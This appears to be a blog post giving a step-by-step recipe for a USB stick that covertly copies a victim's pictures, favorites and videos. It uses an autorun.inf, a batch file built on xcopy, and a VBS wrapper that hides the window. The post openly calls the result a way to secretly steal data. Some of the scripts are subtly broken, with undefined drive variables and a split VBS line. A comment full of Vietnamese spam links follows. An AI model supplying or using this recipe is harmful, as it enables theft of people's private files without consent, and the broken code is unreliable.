Data Stolen USB

 1) Open Notepad.

2) Copy and Paste the following Code into Notepad :
...
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

3) Save this file as autorun.inf.

4) Open Notepad again.

5) Copy and Paste the following Code :

Code:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls

6) Save this file as File.bat.

7) Open Notepad again.

8) Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

9) Save this file as Invisible.vbs.

10) Now again open Notepad.

11) Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

12) Save this as Launch.bat.

13) Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.

14) Create a folder named “Data” where the Stolen contents would be Copied automatically.

15) Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.

So it is simple Trick to Secretly Copy and Steal Data from Computer to a USB or Pendrive.
Reactions:

Post a Comment


 1. Đoan Mộc Cuồng thì thào thầm nghĩ.

  - Hay là bọn chúng ở huyền thiên đại lục?

  Đoan Mộc Cuồng hiện ra một lãnh ý:

  - Vậy thì ta tới huyền thiên đại lục một chuyến.
  dongtam
  game mu
  http://nhatroso.net/
  http://nhatroso.com/
  nhac san cuc manh
  tổng đài tư vấn luật
  http://dichvu.tuvanphapluattructuyen.com/
  văn phòng luật
  tổng đài tư vấn pháp luật
  thành lập công ty
  http://we-cooking.com/
  chém gió
  trung tâm ngoại ngữ
  Một tháng sau, Nhạc Thành nói với bốn tiểu gia hỏa và chúng nữ phải đi lên huyền thiên đại lục xem xét, Nhạc Tử Sơn là người đầu tiên đồng ý, dù sao lập anh trấn cũng là quê hương của ông.

  Bốn tiểu gia hỏa nghe vậy thì cao hứng không thôi.

  Sáng sớm ngày hôm sau, chúng nữ cùng với người nhà Nhạc gia đều tiến vòa trong Hạo Thiên Tháp.

  Từ đây tới Huyền Thiên đại lục phải mất hơn hyai tháng, tuy nhiên trong hai tháng này Nhạc Thành vẫn không thể đột phá từ đại thừa hậu kỳ đỉnh phong lên độ kiếp kỳ, điều này khiến hắn cảm thấy thật bất đắc dĩ.

  ReplyDelete

Locate IP Address

IP
Want This

Widgets

 
Top